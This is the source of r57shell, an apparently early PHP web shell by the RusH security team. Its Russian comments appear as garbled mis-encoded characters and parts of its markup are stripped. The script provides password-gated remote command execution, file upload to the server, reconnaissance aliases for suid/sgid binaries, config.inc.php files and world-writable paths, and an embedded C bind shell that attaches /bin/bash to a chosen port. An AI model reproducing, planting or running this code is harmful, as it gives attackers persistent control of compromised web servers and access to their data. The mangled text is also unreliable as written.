\___|_ / /* -======\/==security=\/=team==\/ /* /* SPECIAL xbIx birthday edition /* /* r57shell.php - ñêðèïò íà ïõï ïîçâîëÿþùèé âàì âûïîëíÿòü øåëë êîìàíäû íà ñåðâåðå ÷åðåç áðàóçåð /* Âû ìîæåòå ñêà÷àòü íîâóþ âåðñèþ íà íàøåì ñàéòå: http://rst.void.ru èëè www.rsteam.ru /* Âåðñèÿ 1.0 beta (ïèñàëàñü ïðàêòè÷åñêè íà êîëåíêå... òàê ÷òî êîä ñûðîâàò... äëÿ òåñòèðîâàíèÿ) /* /* Âîçìîæíîñòè: /* ~ çàùèòà ñêðèïòà ñ ïîìîùüþ ïàðîëÿ /* ~ âûïîëíåíèå øåëë-êîìàíä /* ~ çàãðóçêà ôàéëîâ íà ñåðâåð /* ~ ïîääåðæèâàåò àëèàñû êîìàíä /* ~ âêëþ÷åíû 4 àëèàñà êîìàíä: /* - ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñ suid áèòîì /* - ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñ sgid áèòîì /* - ïîèñê íà ñåðâåðå ôàéëîâ config.inc.php /* - ïîèñê íà ñåðâåðå âñåõ äèðåêòîðèé è ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ /* ~ äâà ÿçûêà èíòåðôåéñà: ðóññêèé, àíãëèéñêèé /* ~ âîçìîæíîñòü çàáèíäèòü /bin/bash íà îïðåäåëåííûé ïîðò /* /* 05.03.2004 (c) RusH security team /* /******************************************************************************************************/ ## Àóòåíòèôèêàöèÿ ## Ëîãèí è ïàðîëü äëÿ äîñòóïà ê ñêðèïòó ## ÍÅ ÇÀÁÓÄÜÒÅ ÑÌÅÍÈÒÜ ÏÅÐÅÄ ÐÀÇÌÅÙÅÍÈÅÌ ÍÀ ÑÅÐÂÅÐÅ!!! $name="r57"; ## ëîãèí ïîëüçîâàòåëÿ $pass="r57"; ## ïàðîëü ïîëüçîâàòåëÿ if(!isset($PHP_AUTH_USER)) { Header('WWW-Authenticate: Basic realm="r57shell"'); Header('HTTP/1.0 401 Unauthorized'); exit; } else { if(($PHP_AUTH_USER != $name ) || ($PHP_AUTH_PW != $pass)) { Header('WWW-Authenticate: Basic realm="r57shell"'); Header('HTTP/1.0 401 Unauthorized'); exit; } } error_reporting(0); set_time_limit(0); /* Âûáîð ÿçûêà $language='ru' - ðóññêèé $language='eng' - àíãëèéñêèé */ $language='ru'; $lang=array( 'ru_text1' => 'Âûïîëíåííàÿ êîìàíäà', 'ru_text2' => 'Âûïîëíåíèå êîìàíä íà ñåðâåðå', 'ru_text3' => 'Âûïîëíèòü êîìàíäó', 'ru_text4' => 'Ðàáî÷àÿ äèðåêòîðèÿ', 'ru_text5' => 'Çàãðóçêà ôàéëîâ íà ñåðâåð', 'ru_text6' => 'Ëîêàëüíûé ôàéë', 'ru_text7' => 'Àëèàñû', 'ru_text8' => 'Âûáåðèòå àëèàñ', 'ru_butt1' => 'Âûïîëíèòü', 'ru_butt2' => 'Çàãðóçèòü', 'ru_text9' => 'Îòêðûòèå ïîðòà è ïðèâÿçêà åãî ê /bin/bash', 'ru_text10' => 'Îòêðûòü ïîðò', 'ru_text11' => 'Ïàðîëü äëÿ äîñòóïà', 'ru_butt3' => 'Îòêðûòü', 'eng_text1' => 'Executed command', 'eng_text2' => 'Execute command on server', 'eng_text3' => ' Run command', 'eng_text4' => 'Work directory', 'eng_text5' => 'Upload files on server', 'eng_text6' => 'Local file', 'eng_text7' => 'Aliases', 'eng_text8' => 'Select alias', 'eng_butt1' => 'Execute', 'eng_butt2' => 'Upload', 'eng_text9' => 'Bind port to /bin/bash', 'eng_text10' => 'Port', 'eng_text11' => 'Password for access', 'eng_butt3' => 'Bind' ); /* Àëèàñû êîìàíä Ïîçâîëÿþò èçáåæàòü ìíîãîêðàòíîãî íàáîðà îäíèõ è òåõ-æå êîìàíä. ( Ñäåëàíî áëàãîäàðÿ ìîåé ïðèðîäíîé ëåíè ) Âû ìîæåòå ñàìè äîáàâëÿòü èëè èçìåíÿòü êîìàíäû. */ $aliases=array( /* ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñ suid áèòîì */ 'find all suid files' => 'find / -type f -perm -04000 -ls', /* ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñ sgid áèòîì */ 'find all sgid files' => 'find / -type f -perm -02000 -ls', /* ïîèñê íà ñåðâåðå ôàéëîâ config.inc.php */ 'find config.inc.php files' => 'find / -type f -name config.inc.php', /* ïîèñê íà ñåðâåðå âñåõ äèðåêòîðèé è ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ */ 'find writable directories and files' => 'find / -perm -2 -ls', '----------------------------------------------------------------------------------------------------' => 'ls -la' ); /* Port bind source */ $port_bind_bd_c=" #include #include #include #include #include #include int main(argc,argv) int argc; char **argv; { int sockfd, newfd; char buf[30]; struct sockaddr_in remote; if(argc < 3) usage(argv[0]); if(fork() == 0) { // Îòâåòâëÿåì íîâûé ïðîöåññ remote.sin_family = AF_INET; remote.sin_port = htons(atoi(argv[1])); remote.sin_addr.s_addr = htonl(INADDR_ANY); sockfd = socket(AF_INET,SOCK_STREAM,0); if(!sockfd) perror(\"socket error\"); bind(sockfd, (struct sockaddr *)&remote, 0x10); listen(sockfd, 5); while(1) { newfd=accept(sockfd,0,0); dup2(newfd,0); dup2(newfd,1); dup2(newfd,2); write(newfd,\"Password:\",10); read(newfd,buf,sizeof(buf)); if (!chpass(argv[2],buf)) system(\"echo welcome to r57 shell && /bin/bash -i\"); else fprintf(stderr,\"Sorry\"); close(newfd); } } } int usage(char *progname) { fprintf(stderr,\"USAGE:%s \n\",progname); exit(0); } int chpass(char *base, char *entered) { int i; for(i=0;i r57shell
   !  r57shell
"; echo "uname -a : 
id : 
pwd : 
"; echo "		"; echo ""; echo "    ".exec("uname -a")."
"; echo "    ".exec("id")."
"; echo "    ".exec("pwd").""; echo ""; echo ""; ?>
$alias_cmd) { if ($_POST['alias'] == $alias_name) {$_POST['cmd']=$alias_cmd;} } } ?>
Error uploading file ".$HTTP_POST_FILES["userfile"][name]."
"); } ?>
".$lang[$language._text1].": ".$_POST['cmd']."
"; echo ""; echo "
"; echo ""; ?>
:: ::
"; echo ""; echo " ".$lang[$language._text3]." è    "; echo "  
"; echo " ".$lang[$language._text4]." è    "; if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo ""; } else { echo ""; } echo "  "; echo ""; echo ""; ?>
:: ::
"; echo ""; echo "       ".$lang[$language._text6]." è    "; echo " "; if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo ""; } else { echo ""; } echo ""; echo ""; echo ""; ?>
:: ::
"; echo ""; echo "         ".$lang[$language._text8]." è    "; echo ""; if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo ""; } else { echo ""; } echo "  "; echo ""; echo ""; ?>
:: ::
"; echo ""; echo "              ".$lang[$language._text10]." è    "; echo " "; echo "      ".$lang[$language._text11]." è    "; echo " "; if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo ""; } else { echo ""; } echo ""; echo "      "; echo ""; echo ""; ?>
o---[ r57shell - http-shell by RusH security team | http://rst.void.ru | version 1.0 beta ]---o"; ?>